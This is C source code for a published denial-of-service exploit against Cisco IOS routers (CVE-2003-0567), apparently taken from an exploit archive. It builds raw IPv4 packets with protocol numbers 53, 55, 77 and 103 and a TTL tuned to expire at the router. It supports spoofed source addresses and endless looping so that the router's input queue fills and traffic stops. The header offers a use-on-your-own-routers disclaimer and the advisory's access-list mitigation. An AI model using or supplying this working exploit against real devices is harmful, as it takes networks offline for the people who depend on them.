Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service - CVE-2003-0567

1. /*******************************************************/
2. /* cisco-bug-44020.c - Copyright by Martin Kluge (martin@elxsi.de) */
3. /*                                                                                            */
4. /* Feel free to modify this code as you like, as long as you include */
5. /* the above copyright statement.                                               */
6. /*                                                                                            */
7. /* Please use this code only to check your OWN cisco routers.         */
8. /*                                                                                            */
9. /*                                                                                            */
10. /* This exploit uses the bug in recent IOS versions to stop router    */
11. /* from processing traffic once the input queue is full.                    */
12. /*                                                                                            */
13. /*                                                                                            */
14. /* Use access control lists as described in the CISCO advisory to     */
15. /* protect your cisco routers:                                                       */
16. /*                                                                                            */
17. /* access-list 101 deny 53 any any                                              */
18. /* access-list 101 deny 55 any any                                              */
19. /* access-list 101 deny 77 any any                                              */
20. /* access-list 101 deny 103 any any                                            */
21. /*                                                                                            */
22. /* This code was only tested on linux, no warranty is or will be        */
23. /*                                                                                            */
24. /* Usage: ./cisco-bug-44020 <src ip> <dst ip> <hops> <number>  */
25. /* Source IP: Your source IP (or a spoofed source IP)                    */
26. /* Destination IP: The IP of the vulnerable cisco router                  */
27. /* Hops: The number of hops between you and the router,             */
28. /* the time to live (ttl) should be 0 when the packet                      */
29. /* is received by the cisco router.                                                 */
30. /* Number: Number of packets to send (0 = loop)                         */
31. /* provided.                                                                              */
32. /*******************************************************/
33.  
34. #include <stdio.h>
35. #include <stdlib.h>
36. #include <string.h>
37. #include <unistd.h>
38.  
39. #include <arpa/inet.h>
40. #include <netinet/in.h>
41.  
42. #include <sys/time.h>
43. #include <sys/types.h>
44. #include <sys/socket.h>
45.  
46. #define DEBUG
47.  
48. #ifndef IPPROTO_RAW
49. #define IPPROTO_RAW 0
50. #endif
51.  
52. /* IPv4 header */
53. struct ipv4_pkt_header {
54. unsigned int ipvhl:8; /* Version + Header length */
55. unsigned int type_service:8; /* TOS(Type of Service) field */
56. unsigned short packet_len; /* Header+Payload length */
57. unsigned short ident; /* Identification field */
58. unsigned short fragment; /* Fragment Offset field */
59. unsigned int time_live:8; /* TTL(Time to Live) field */
60. unsigned int protocol:8; /* Protocol field */
61. unsigned short sum; /* Checksum field */
62. struct in_addr src_ip; /* Source IP */
63. struct in_addr dst_ip; /* Destination IP */
64. };
65.  
66.  
67. char proto[] = {53,55,77,103};
68.  
69.  
70. /* Prototypes */
71. int in_cksum (unsigned short *, int, int);
72.  
73.  
74. /* Main function */
75. int main (int argc, char *argv[]) {
76. struct ipv4_pkt_header ipv4_hdr;
77. struct sockaddr_in sin;
78. struct timeval seed;
79.  
80. unsigned long src_ip, dst_ip;
81. int fd, hops, count, bytes;
82. int len=0, i=0, n=0, loop=0;
83.  
84. unsigned char *buf;
85.  
86. /* Check command line args */
87. if(argc != 5) {
88. fprintf(stderr, "Usage: %s <src ip> <dst ip> <hops> <number>\n\n", argv[0]);
89. return(EXIT_FAILURE);
90. }
91.  
92. src_ip = inet_addr(argv[1]);
93. dst_ip = inet_addr(argv[2]);
94. hops = atoi(argv[3]);
95. count = atoi(argv[4]);
96.  
97. if(count == 0) { loop=1; count=1; }
98.  
99. #ifdef DEBUG
100. printf("DEBUG: Hops: %i\n", hops);
101. #endif
102.  
103. /* Open a raw socket */
104. if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
105. fprintf(stderr, "Error: Cannot open raw socket.\n");
106. return(EXIT_FAILURE);
107. }
108.  
109. /* Build the IPv4 header */
110. ipv4_hdr.ipvhl = ((4 << 4) | 0x0f) & (5 | 0xf0); /* :) */
111. ipv4_hdr.type_service = 0x10;
112.  
113. #ifdef OSTYPE_BSD
114. ipv4_hdr.packet_len = 0x14 + len;
115. ipv4_hdr.fragment = 0x4000;
116. #else
117. ipv4_hdr.packet_len = htons(0x14 + len);
118. ipv4_hdr.fragment = htons(0x4000);
119. #endif
120.  
121. ipv4_hdr.time_live = hops;
122. ipv4_hdr.src_ip.s_addr = src_ip;
123. ipv4_hdr.dst_ip.s_addr = dst_ip;
124.  
125. while(n < count) {
126. /* Seed the random generator */
127. if(gettimeofday(&seed, NULL) == -1) {
128. fprintf(stderr, "Error: Cannot seed the random generator.\n");
129. return(EXIT_FAILURE);
130. }
131.  
132. srandom((unsigned int) (seed.tv_sec ^ seed.tv_usec));
133.  
134. ipv4_hdr.protocol = proto[random() % 0x4];
135.  
136. #ifdef DEBUG
137. printf("DEBUG: Protocol: %i\n", ipv4_hdr.protocol);
138. #endif
139.  
140. ipv4_hdr.ident = htons(random() % 0x7fff);
141.  
142. /* Calculate checksum */
143. ipv4_hdr.sum = 0x0000;
144. ipv4_hdr.sum = in_cksum((unsigned short *) &ipv4_hdr, 0x14 + len, 0);
145.  
146. #ifdef DEBUG
147. printf("DEBUG: Checksum: %i\n", ipv4_hdr.sum);
148. #endif
149.  
150. buf = malloc(0x14 + len);
151. memset(buf, '\0', 0x14 + len);
152.  
153. memcpy((unsigned char *) buf, (unsigned char *) &ipv4_hdr,
154. 0x14 + len);
155.  
156. #ifdef DEBUG
157. printf("DEBUG: ");
158. for(i=0; i < 0x14 + len; i++)
159. printf(" %02x", buf[i]);
160. printf("\n");
161. #endif
162.  
163.  
164. memset(&sin, '\0', sizeof(struct sockaddr_in));
165. sin.sin_family = AF_INET;
166. sin.sin_addr.s_addr = dst_ip;
167.  
168. bytes = sendto(fd, buf, 0x14 + len, 0, (struct sockaddr *) &sin,
169. sizeof(struct sockaddr));
170.  
171. #ifdef DEBUG
172. printf("DEBUG: Wrote %i bytes.\n", bytes);
173. #endif
174.  
175. if(loop != 1) n++;
176.  
177. free(buf);
178. }
179.  
180. close(fd);
181. return(EXIT_SUCCESS);
182. }
183.  
184.  
185. int in_cksum(unsigned short *addr, int len, int csum) {
186. register int sum = csum;
187. unsigned short answer = 0;
188. register unsigned short *w = addr;
189. register int nleft = len;
190.  
191. /*
192. * Our algorithm is simple, using a 32 bit accumulator (sum), we add
193. * sequential 16 bit words to it, and at the end, fold back all the
194. * carry bits from the top 16 bits into the lower 16 bits.
195. */
196. while (nleft > 1) {
197. sum += *w++;
198. nleft -= 2;
199. }
200.  
201. /* mop up an odd byte, if necessary */
202. if (nleft == 1) {
203. sum += htons(*(unsigned char *)w<<8);
204. }
205. /* add back carry outs from top 16 bits to low 16 bits */
206. sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
207. sum += (sum >> 16); /* add carry */
208. answer = ~sum; /* truncate to 16 bits */
209. return(answer);
210. }
211.  
212.  
213. // milw0rm.com [2003-07-21]
214.